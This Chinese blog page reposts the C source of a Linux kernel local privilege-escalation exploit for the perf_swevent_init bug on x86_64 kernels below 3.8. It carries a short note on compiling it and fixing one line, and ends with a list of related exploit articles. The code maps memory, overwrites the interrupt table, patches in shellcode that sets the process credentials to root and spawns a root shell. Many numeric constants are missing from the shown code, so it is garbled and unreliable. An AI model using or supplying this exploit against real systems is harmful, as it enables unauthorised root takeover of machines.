64位上编译

另外修改了原Exploit的一个错误

第76行
把     uint64_t *p = (void *) ¤t[i];
改成       uint64_t *p = (void *) &current[i];

*
* CVE-- exploit x86_64 Linux < 3.8.
* by sorbo (sorbo@darkircop.org) June
*
* Based on sd's exploit. Supports more targets.
*
*/ #define _GNU_SOURCE
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdint.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <linux/perf_event.h>
#include <signal.h>
#include <assert.h> #define BASE 0x380000000
#define BASE_JUMP 0x1780000000
#define SIZE 0x10000000
#define KSIZE 0x2000000 #define TMP(x) (0xdeadbeef + (x)) struct idt {
uint16_t limit;
uint64_t addr;
} __attribute__((packed)); static int _fd; static int perf_open(uint64_t off)
{
struct perf_event_attr attr;
int rc; // printf("perf open %lx [%d]\n", off, (int) off); memset(&attr, , sizeof(attr)); attr.type = PERF_TYPE_SOFTWARE;
attr.size = sizeof(attr);
attr.config = off;
attr.mmap = ;
attr.comm = ;
attr.exclude_kernel = ; rc = syscall(SYS_perf_event_open, &attr, , -, -, ); return rc;
} void __sc_start(void);
void __sc_next(void); void __sc(void)
{
asm("__sc_start:\n"
"call __sc_next\n"
"iretq\n"
"__sc_next:\n");
} void sc(void)
{
int i, j;
uint8_t *current = *(uint8_t **)(((uint64_t) &i) & (-));
uint64_t kbase = ((uint64_t)current) >> ;
int uid = TMP();
int gid = TMP(); for (i = ; i < ; i += ) {
uint64_t *p = (void *) &current[i];
uint32_t *cred = (uint32_t*) p[]; if ((p[] != p[]) || ((p[]>>) != kbase))
continue; for (j = ; j < ; j++) {
if (cred[j] == uid && cred[j + ] == gid) {
for (i = ; i < ; i++) {
cred[j + i] = ;
return;
}
}
}
}
} static void sc_replace(uint8_t *sc, uint32_t needle, uint32_t val)
{
void *p; p = memmem(sc, , &needle, sizeof(needle));
if (!p)
errx(, "can't find %x", needle); memcpy(p, &val, sizeof(val));
} static void *map_mem(uint64_t addr)
{
void *p; p = mmap((void*) addr, SIZE, PROT_READ | PROT_WRITE,
MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -, ); if (p == MAP_FAILED)
err(, "mmap()"); return p;
} static int find_mem(void *mem, uint8_t c)
{
int i;
uint8_t *p = mem; for (i = ; i < SIZE; i++) {
if (p == c)
return i;
} return -;
} static void dropshell()
{
if (setuid() != )
errx(, "failed"); printf("Launching shell\n"); execl("/bin/sh", "sh", NULL);
exit();
} void morte(int x)
{
printf("Got signal\n");
close(_fd);
dropshell();
} static void trigger(int intr)
{
switch (intr) {
case :
do {
int z = ;
int a = ; z--; a /= z;
} while ();
break; case :
asm("int $4");
break; case 0x80:
asm("int $0x80");
break; default:
errx(, "unknown intr %d", intr);
} sleep();
} int main(int argc, char *argv[])
{
uint32_t *p[];
int fd, i;
uint64_t off;
uint64_t addr = BASE;
struct idt idt;
uint8_t *kbase;
int sz = ;
int intr = ; printf("Searchin...\n"); p[] = map_mem(BASE);
p[] = map_mem(BASE_JUMP); memset(p[], 0x69, SIZE); off = 0xFFFFFFFFL;
fd = perf_open(off);
close(fd); i = find_mem(p[], 0xff);
if (i == -) {
i = find_mem(p[], 0x68); if (i == -)
errx(, "Can't find overwrite"); sz = ;
addr = BASE_JUMP;
printf("detected CONFIG_JUMP_LABEL\n");
} munmap(p[], SIZE);
munmap(p[], SIZE); addr += i;
addr -= off * sz; printf("perf_swevent_enabled is at 0x%lx\n", addr); asm("sidt %0" : "=m" (idt)); printf("IDT at 0x%lx\n", idt.addr); off = addr - idt.addr;
off -= ; switch (off % sz) {
case :
intr = ;
break; case :
intr = 0x80;
break; case :
intr = ;
break; default:
errx(, "remainder %d", off % sz);
} printf("Using interrupt %d\n", intr); off -= * intr; assert((off % sz) == ); off /= sz;
off = -off; // printf("Offset %lx\n", off); kbase = (uint8_t*) (idt.addr & 0xFF000000); printf("Shellcode at %p\n", kbase); if (mmap(kbase, KSIZE, PROT_READ | PROT_WRITE | PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -, ) == MAP_FAILED)
err(, "mmap()"); memset(kbase, 0x90, KSIZE);
kbase += KSIZE - ; i = __sc_next - __sc_start;
memcpy(kbase, __sc_start, i);
kbase += i;
memcpy(kbase, sc, ); sc_replace(kbase, TMP(), getuid());
sc_replace(kbase, TMP(), getgid()); signal(SIGALRM, morte);
alarm(); printf("Triggering sploit\n");
_fd = perf_open(off); trigger(intr); exit();
}

Linux kernel perf_swevent_init Local root Exploit的更多相关文章

  1. [轉]Linux kernel <2.6.29 exit_notify() local root exploit分析(2009-1337)

    author : deep_pro目前网上的这个exploit(http://www.milw0rm.com/exploits/8369)的分析是有些问题的(http://forum.evilocta ...

  2. [轉]Exploit Linux Kernel Slub Overflow

    Exploit Linux Kernel Slub Overflow By wzt 一.前言 最近几年关于kernel exploit的研究比较热门,常见的内核提权漏洞大致可以分为几类: 空指针引用, ...

  3. karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

    catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...

  4. Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

    In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...

  5. [轉]Exploit The Linux Kernel NULL Pointer Dereference

    Exploit The Linux Kernel NULL Pointer Dereference Author: wztHome: http://hi.baidu.com/wzt85date: 20 ...

  6. CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

    /**  * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC  *  * Vitaly Nikolenko  * http://ha ...

  7. ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728)

    ANALYSIS AND EXPLOITATION OF A LINUX KERNEL VULNERABILITY (CVE-2016-0728) By Perception Point Resear ...

  8. archlinux 传统方法编译内核linux kernel 3.3.7

    From: http://hi.baidu.com/flashgive/item/eaef6326b5eb73d3a417b662 archlinux中传统方法编译内核 1)下载内核以及补丁并解压: ...

  9. the Linux Kernel: Traffic Control, Shaping and QoS

    −Table of Contents Journey to the Center of the Linux Kernel: Traffic Control, Shaping and QoS 1 Int ...

随机推荐

  1. kettle与各数据库建立链接的链接字符串

    kettle与各数据库建立链接的链接字符串 Sybase: TO_DB_URL = jdbc:sybase:Tds:192.168.168.163:5000/testdb?charset=eucgb& ...

  2. Java for LeetCode 187 Repeated DNA Sequences

    All DNA is composed of a series of nucleotides abbreviated as A, C, G, and T, for example: "ACG ...

  3. HDU1850 Being a Good Boy in Spring Festival(博弈)

    Being a Good Boy in Spring Festival Time Limit: 1000MS   Memory Limit: 32768KB   64bit IO Format: %I ...

  4. Light OJ 1253 Misere Nim (尼姆博弈(2))

    LightOJ1253 :Misere Nim 时间限制:1000MS    内存限制:32768KByte   64位IO格式:%lld & %llu 描述 Alice and Bob ar ...

  5. Java性能优化权威指南-读书笔记(五)-JVM性能调优-吞吐量

    吞吐量是指,应用程序的TPS: 每秒多少次事务,QPS: 每秒多少次查询等性能指标. 吞吐量调优就是减少垃圾收集器消耗的CPU周期数,从而将更多的CPU周期用于执行应用程序. CMS吞吐调优 CMS包 ...

  6. Fence Repair(poj 3253)

    题意: 有一个农夫要把一个木板钜成几块给定长度的小木板,每次锯都要收取一定费用,这个费用就是当前锯的这个木版的长度 给定各个要求的小木板的长度,及小木板的个数n,求最小费用 提示: 以 3 5 8 5 ...

  7. popular net

    陈皓<跟我一起写makefile>http://blog.csdn.net/haoel/article/details/2886/

  8. 怎么判定一个mac地址是multicast还是unicast.

    MAC地址是以太网二层使用的一个48bit(6字节十六进制数)的地址,用来标识设备位置.MAC地址分成两部分,前24位是组织唯一标识符(OUI, Organizationally unique ide ...

  9. 自动、手动同步FishEye, JIRA的联系人信息

    背景:在将FishEye和JIRA配置成共用用户信息,并且可以在二者之间自由切换,此时FishEye里的用户信息是不能更改的,只有更新了JIRA,然后让其同步至FishEye才行,如何进行设置呢? 答 ...

  10. FZU 2183 字符串处理

    Problem Description 现在有一些被简单压缩的字符串,例如:a[120]代表120个a.对于字符串acb[3]d[5]e相对于acbbbddddde 现在给你两个字符串cString, ...